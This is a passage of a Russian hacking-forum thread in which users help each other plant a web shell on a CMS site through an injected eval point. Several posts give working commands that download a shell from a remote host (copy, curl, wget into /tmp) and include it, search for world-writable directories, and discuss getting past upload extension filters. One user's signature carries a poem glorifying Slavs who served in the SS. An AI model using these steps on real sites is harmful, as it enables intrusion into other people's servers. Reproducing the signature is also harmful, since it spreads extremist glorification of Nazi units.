ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.12.2009, 16:19
Аватар для Arkaim
Arkaim
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653

Репутация: 5
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
да в тмп накосячил чуть

с чего ты решил что не грузит в папку /tmp/?
Потому что вот такой скрипт <?php curl('http://www.site.ru/files/wso2.txt','/etc/shell.php'); ?>

не выполняется. пишется готово и белая страница. и инклуд <?php include '/etc/shell.php' ?> не происходит

как же быть?
 
Ответить с цитированием

  #12  
Старый 24.12.2009, 16:20
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

грю накосячил, в /tmp/ лей а не /етс/
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #13  
Старый 24.12.2009, 16:22
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Arkaim  
Потому что вот такой скрипт <?php curl('http://www.site.ru/files/wso2.txt','/etc/shell.php'); ?>

не выполняется. пишется готово и белая страница. и инклуд <?php include '/etc/shell.php' ?> не происходит

как же быть?

Цитата:
<?php include ('/etc/shell.php');?>
а не так ли в итоге?

Зачем заново создавать код в странице, ты один раз написал вон тот, который дал тебе пашкела, так его и не меняй , просто вставляй вместо пхпинфо();

copy('http://www.site.ru/files/wso2.txt','/tmp/1.php');
а затем include('/tmp/1.php');

// сорр курсач просто висит не curl а copy
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

Последний раз редактировалось HAXTA4OK; 24.12.2009 в 16:59..
 
Ответить с цитированием

  #14  
Старый 24.12.2009, 17:25
Аватар для Arkaim
Arkaim
Новичок
Регистрация: 06.10.2009
Сообщений: 16
Провел на форуме:
52653

Репутация: 5
По умолчанию

Вот что выдаёт когда делаю команду copy

copy(http://www.site.ru/files/wso2.txt) [function.copy]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/www.site.ru/includes/common.inc(1343) : eval()'d code(1) : eval()'d code on line 1.
 
Ответить с цитированием

  #15  
Старый 24.12.2009, 17:37
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Перед тем как использовать copy или include(файла со стороннего сервера), убедись в том что директивы allow_url_fopen или allow_url_include, соответственно, стоят в on.

если safe_mode=off, то можно с system попробовать,
=system('wget site.com/shell.txt -O /tmp/1.php'); , или альтернативными качалками , ну и потом инклудить, как было написано выше.

Последний раз редактировалось Iceangel_; 24.12.2009 в 17:52..
 
Ответить с цитированием

  #16  
Старый 24.12.2009, 17:41
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

?cmd=system('which wget');
если вывел, но смотрим дальше.
?cmd=system('ls -la'); - ещем, где права 777 /*Iceangel_: проще воспользоваться командой 'find /www -type d -perm 0777'*/
?cmd=system('cd папка/где/права/777; wget http://shell.com/shell.txt -O shell.php');

PROFIT!!!

Последний раз редактировалось Iceangel_; 24.12.2009 в 17:48..
 
Ответить с цитированием

  #17  
Старый 11.04.2010, 02:00
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Я апну тему...
Таже трабла, что и у ТСа, тоже версия 6.14 (по changelog'у пасмарел) заливается шелл но .php3 не выполняется, .pl меняется на pl_
.htaccess меняется на htaccess.
.php3.7z меняется на .php3_.7z

А дальше вы про темы говорите, но я немогу найти вобще как там темы заливать
Гугл вобще говорит темы надо копировать в папку на сервере, так былбы у меня доступ к папке каконить, нафик мне надо былобы это

Последний раз редактировалось Ponchik; 11.04.2010 в 02:03..
 
Ответить с цитированием

  #18  
Старый 22.04.2010, 01:44
Аватар для hatamahata
hatamahata
Новичок
Регистрация: 10.06.2009
Сообщений: 14
Провел на форуме:
337389

Репутация: 14
По умолчанию

Цитата:
Сообщение от Ponchik  
Я апну тему...
Таже трабла, что и у ТСа, тоже версия 6.14 (по changelog'у пасмарел) заливается шелл но .php3 не выполняется, .pl меняется на pl_
.htaccess меняется на htaccess.
.php3.7z меняется на .php3_.7z

А дальше вы про темы говорите, но я немогу найти вобще как там темы заливать
Гугл вобще говорит темы надо копировать в папку на сервере, так былбы у меня доступ к папке каконить, нафик мне надо былобы это

тоже самое
 
Ответить с цитированием

  #19  
Старый 27.04.2010, 04:36
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Ну АП кагбы...
 
Ответить с цитированием

  #20  
Старый 27.04.2010, 07:05
Аватар для _eXorcist_
_eXorcist_
Участник форума
Регистрация: 24.12.2009
Сообщений: 130
Провел на форуме:
528073

Репутация: -3
Отправить сообщение для _eXorcist_ с помощью ICQ
По умолчанию

скорей всего архивировать папку надо потом заливать на сервер

Последний раз редактировалось _eXorcist_; 27.04.2010 в 07:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
.: Залив Шелла на Двиг PHP Fusion через Админку :. SuNDowN Сценарии/CMF/СMS 4 15.12.2009 23:57
Проблема с сокетами(Delphi 2009 и PHP) Dead_Zorro С/С++, C#, Delphi, .NET, Asm 3 26.12.2008 21:46
проблема с php скриптом, помогите плиз Utochka PHP, PERL, MySQL, JavaScript 0 24.03.2006 15:59
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ